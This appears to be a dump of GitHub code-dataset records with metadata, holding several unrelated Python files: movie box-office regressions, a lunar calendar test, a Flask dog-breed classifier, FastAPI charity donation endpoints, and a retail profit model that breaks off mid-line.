Gross'])\nplt.xlabel('Weekend 3 Theaters')\nplt.ylabel('Worldwide Gross')\n\nplt.scatter(df4['Weekend 2 Theaters'], df4['Worldwide Gross'])\nplt.xlabel('Weekend 2 Theaters')\nplt.ylabel('Worldwide Gross')\n\n\nplt.scatter(df4['Weekend 1 Theaters'], df4['Worldwide Gross'])\nplt.xlabel('Weekend 1 Theaters')\nplt.ylabel('Worldwide Gross')\n\nfrom scipy.stats import randint as sp_randint\n# specify parameters and distributions to sample from\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\n\n#Append df_dummies_genre to each and then regress\ndf_dummies_genre = pd.get_dummies(df4['Genre'], drop_first=True) \ndf_R = df4[df4['MPAA']=='R']\ndf_R= df_R[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_R = pd.concat([df_R, df_dummies_genre], axis =1, join_axes=[df_R.index])\n\nX,y = df_R.drop('Worldwide Gross', axis = 1),df_R['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\n\n\n\ndf_PG13 = df4[df4['MPAA']=='PG-13']\ndf_PG13= df_PG13[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_PG13 = pd.concat([df_PG13, df_dummies_genre], axis =1, join_axes=[df_PG13.index])\n\nX,y = df_PG13.drop('Worldwide Gross', axis = 1),df_PG13['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\n\n\ndf_PG = df4[df4['MPAA']=='PG']\ndf_PG= df_PG[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_PG = pd.concat([df_PG, df_dummies_genre], axis =1, join_axes=[df_PG.index])\n\nX,y = df_PG.drop('Worldwide Gross', axis = 1),df_PG['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\ndf_G = df4[df4['MPAA']=='G']\ndf_G= df_G[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_G = pd.concat([df_G, df_dummies_genre], axis =1, join_axes=[df_G.index])\n\nX,y = df_G.drop('Worldwide Gross', axis = 1),df_G['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n#%%\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\n\n\n\ndf_regression = df4[['Production Budget', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT']]\ndf_regression = pd.concat([df_regression, df_dummies], axis =1, join_axes=[df_regression.index])\nX,y = df_regression,df4['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nmodel = LinearRegression()\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\n\n\n\n\n\n\n\n\n", "repo_name": "YaoNiMing/privateML", "sub_path": "projects/02-luther/submissions/SarickShah/LutherProject.py", "file_name": "LutherProject.py", "file_ext": "py", "file_size_in_byte": 14319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 164, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 165, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "scipy.stats.randint", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 204, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 206, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 209, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 215, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 222, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 225, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 227, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 230, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 230, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 231, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 245, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 246, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 247, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 249, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 251, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 254, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 254, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 265, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 268, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 269, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 272, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 274, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 277, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 278, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 286, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 289, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 290, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 291, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 293, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 295, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 298, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 307, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 315, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 318, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 318, "usage_type": "name"}]} +{"seq_id": "42656835365", "text": "import calendar\nfrom calendar import Calendar\n\nimport lunardate\n\nfrom common.JieQi.SolarTerms import getjieqi_info\n\ncalendar.setfirstweekday(firstweekday=6)\nprint(calendar.month(2019, 11))\ncalendar_items = calendar.monthcalendar(2019, 11)\nprint(calendar_items)\n\nca = Calendar(firstweekday=6)\niter_month = ca.itermonthdates(2019, 11)\nfor month in iter_month:\n print(month)\n\nday_info_dic = {\n 1: \"初一\",\n 2: \"初二\",\n 3: \"初三\",\n 4: \"初四\",\n 5: \"初五\",\n 6: \"初六\",\n 7: \"初七\",\n 8: \"初八\",\n 9: \"初九\",\n 10: \"初十\",\n 11: \"十一\",\n 12: \"十二\",\n 13: \"十三\",\n 14: \"十四\",\n 15: \"十五\",\n 16: \"十六\",\n 17: \"十七\",\n 18: \"十八\",\n 19: \"十九\",\n 20: \"二十\",\n 21: \"二十一\",\n 22: \"二十二\",\n 23: \"二十三\",\n 24: \"二十四\",\n 26: \"二十六\",\n 25: \"二十五\",\n 27: \"二十七\",\n 28: \"二十八\",\n 29: \"二十九\",\n 30: \"三十\",\n 31: \"三十一\",\n 32: \"三十二\",\n}\n\n\ndef monthdatescalendar_info(year, month):\n jieqi_data = getjieqi_info(year)\n day_date_items = ca.monthdatescalendar(year, month)\n for day_date_list in day_date_items:\n for day_date in day_date_list:\n yinlidate = lunardate.LunarDate.fromSolarDate(day_date.year, day_date.month, day_date.day)\n if day_date.month == month:\n disable = 0\n else:\n disable = 1\n print(day_date, yinlidate, day_info_dic[yinlidate.day], disable, jieqi_data.get(str(day_date), \"\"))\n\n\nfor i in range(12):\n print(i)\n monthdatescalendar_info(2020, i + 1)\n", "repo_name": "ocswor/clendar_backend", "sub_path": "apps/common/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "calendar.setfirstweekday", "line_number": 8, "usage_type": "call"}, {"api_name": "calendar.month", "line_number": 9, "usage_type": "call"}, {"api_name": "calendar.monthcalendar", "line_number": 10, "usage_type": "call"}, {"api_name": "calendar.Calendar", "line_number": 13, "usage_type": "call"}, {"api_name": "common.JieQi.SolarTerms.getjieqi_info", "line_number": 55, "usage_type": "call"}, {"api_name": "lunardate.LunarDate.fromSolarDate", "line_number": 59, "usage_type": "call"}, {"api_name": "lunardate.LunarDate", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "72851785474", "text": "from flask import Flask, render_template, request\nimport io\nfrom keras.preprocessing import image\nfrom keras.models import model_from_json\nimport json\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\nwith open('static/breeds.json') as f:\n\tdog_names = json.load(f)\n\tprint(dog_names)\n\ndef path_to_tensor(img_path):\n # loads RGB image as PIL.Image.Image type\n img = image.load_img(img_path, target_size=(224, 224))\n # convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)\n x = image.img_to_array(img)\n # convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor\n return np.expand_dims(x, axis=0)\n\ndef extract_Xception(tensor):\n\tfrom keras.applications.xception import Xception, preprocess_input\n\treturn Xception(weights='../saved_models/imagenet.h5', include_top=False).predict(preprocess_input(tensor))\n\ndef predict_breed_Xception(img_path): \t\n\tjson_file = open('../saved_models/Xception.json', 'r')\n\tmodel_json = json_file.read()\n\tjson_file.close()\n\tmodel = model_from_json(model_json)\n\t# load weights into new model\n\tmodel.load_weights(\"../saved_models/weights.best.Xception.hdf5\")\n\tbottleneck_feature = extract_Xception(path_to_tensor(img_path))\n\n\tpredicted_vector = model.predict(bottleneck_feature)\n\n\tpredicted_index = np.argmax(predicted_vector)\n\tlabel = dog_names[predicted_index]\n\treturn label, predicted_vector\n\n@app.route('/')\ndef main():\n return render_template('app.html')\n\n@app.route('/upload', methods = ['POST'])\ndef upload():\n file = request.files['file']\n\n filename = secure_filename(file.filename)\n path = os.path.join('static/', filename)\n file.save(path)\n label, vector = predict_breed_Xception(path)\n os.remove(path)\n\n res = dict(prediction = label)\n\n return json.dumps(res)\n", "repo_name": "jakubkocvara/Dog-Breed-Classifier", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 18, "usage_type": "name"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.applications.xception.Xception", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.applications.xception.preprocess_input", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.models.model_from_json", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "35368855898", "text": "from typing import List\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom app.core.db import get_async_session\nfrom app.core.user import current_user, current_superuser\nfrom app.crud.donation import donation_crud\nfrom app.models import User\nfrom app.schemas.donation import DonationDB, DonationCreate, DonationDBUser\nfrom app.services.investment import run_investment_process\n\nrouter = APIRouter()\n\n\n@router.post(\n '/',\n response_model=DonationDBUser,\n response_model_exclude_none=True,\n)\nasync def create_new_donation(\n donation: DonationCreate,\n user: User = Depends(current_user),\n session: AsyncSession = Depends(get_async_session),\n):\n \"\"\"Сделать пожертвование\"\"\"\n new_donation = await donation_crud.create(\n obj_in=donation,\n user=user,\n session=session,\n )\n new_donation = await run_investment_process(\n obj_in=new_donation,\n session=session\n )\n return new_donation\n\n\n@router.get(\n '/',\n response_model=List[DonationDB],\n response_model_exclude_none=True,\n dependencies=[Depends(current_superuser)],\n)\nasync def get_all_donations(\n session: AsyncSession = Depends(get_async_session),\n):\n \"\"\"\n Только для суперюзеров. \n Возвращает список всех пожертвований.\n \"\"\"\n all_donations = await donation_crud.get_multi(\n session=session\n )\n return all_donations\n\n\n@router.get(\n '/my',\n response_model_exclude_none=True,\n response_model=List[DonationDBUser]\n)\nasync def get_user_donations(\n user: User = Depends(current_user),\n session: AsyncSession = Depends(get_async_session),\n):\n \"\"\"Вернуть список пожертвований пользователя, выполняющего запрос.\"\"\"\n user_donations = await donation_crud.get_by_user(\n user=user,\n session=session\n )\n return user_donations\n", "repo_name": "iamTroyanskiy/cat_charity_fund", "sub_path": "app/api/endpoints/donation.py", "file_name": "donation.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "app.schemas.donation.DonationCreate", "line_number": 22, "usage_type": "name"}, {"api_name": "app.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "app.core.user.current_user", "line_number": 23, "usage_type": "argument"}, {"api_name": "fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 24, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.create", "line_number": 27, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 27, "usage_type": "name"}, {"api_name": "app.services.investment.run_investment_process", "line_number": 32, "usage_type": "call"}, {"api_name": "app.schemas.donation.DonationDBUser", "line_number": 18, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 46, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 46, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 46, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.get_multi", "line_number": 52, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "app.schemas.donation.DonationDB", "line_number": 41, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 43, "usage_type": "call"}, {"api_name": "app.core.user.current_superuser", "line_number": 43, "usage_type": "argument"}, {"api_name": "app.models.User", "line_number": 64, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 65, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 64, "usage_type": "call"}, {"api_name": "app.core.user.current_user", "line_number": 64, "usage_type": "argument"}, {"api_name": "fastapi.Depends", "line_number": 65, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 65, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.get_by_user", "line_number": 68, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "app.schemas.donation.DonationDBUser", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "21834470599", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 2 16:08:13 2022\n\n@author: kasey\n\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Libraries and Definitions\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import metrics\nimport seaborn as sns\n\n#initialize label encoder\nlabel_encoder = preprocessing.LabelEncoder()\n\n#function to plot feature importance\ndef plot_feature_importance(importance,names,model_type):\n\n #Create arrays from feature importance and feature names\n feature_importance = np.array(importance)\n feature_names = np.array(names)\n \n #Create a DataFrame using a Dictionary\n data={'feature_names':feature_names,'feature_importance':feature_importance}\n fi_df = pd.DataFrame(data)\n \n #Sort the DataFrame in order decreasing feature importance\n fi_df.sort_values(by=['feature_importance'], ascending=False,inplace=True)\n \n #Define size of bar plot\n plt.figure(figsize=(10,8))\n #Plot Searborn bar chart\n sns.barplot(x=fi_df['feature_importance'], y=fi_df['feature_names'])\n #Add chart labels\n plt.title(model_type + 'FEATURE IMPORTANCE')\n plt.xlabel('FEATURE IMPORTANCE')\n plt.ylabel('FEATURE NAMES')\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Data\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Read in excel file, changing sheet name when necessary \ndf = pd.read_csv(r'C:\\Users\\kasey\\Documents\\Online_Retail.csv', encoding = 'unicode_escape')\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nData Cleaning\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Change InvoiceDate to InvoiceMonth\ndf['InvoiceMonth'] = pd.DatetimeIndex(df['InvoiceDate']).month\n#Create Profit field for predictions\ndf['Profit'] = df['Quantity'] * df['UnitPrice']\n\n#Remove negative values from Quantity feature (removes ~2% of the data)\ndf = df[df.Quantity >= 0]\n#Create copy of dataframe for results\nfinal_df = df.copy()\n\n#Define the features to be used in the model\ncols_to_keep = ['UnitPrice', 'Country', 'InvoiceMonth', 'Description', 'Profit']\n#Remove unneccessary features\ncluster_df = df[cols_to_keep].copy()\n\n#Label encode the Country and Description fields to be able to use the non-numeric field\ncluster_df['Country'] = label_encoder.fit_transform(cluster_df['Country'])\ncluster_df['Description'] = label_encoder.fit_transform(cluster_df['Description'])\n\n#Save labels and features for feature importance\nlabel = np.array(cluster_df['Profit'])\nfeatures = cluster_df.drop('Profit', axis = 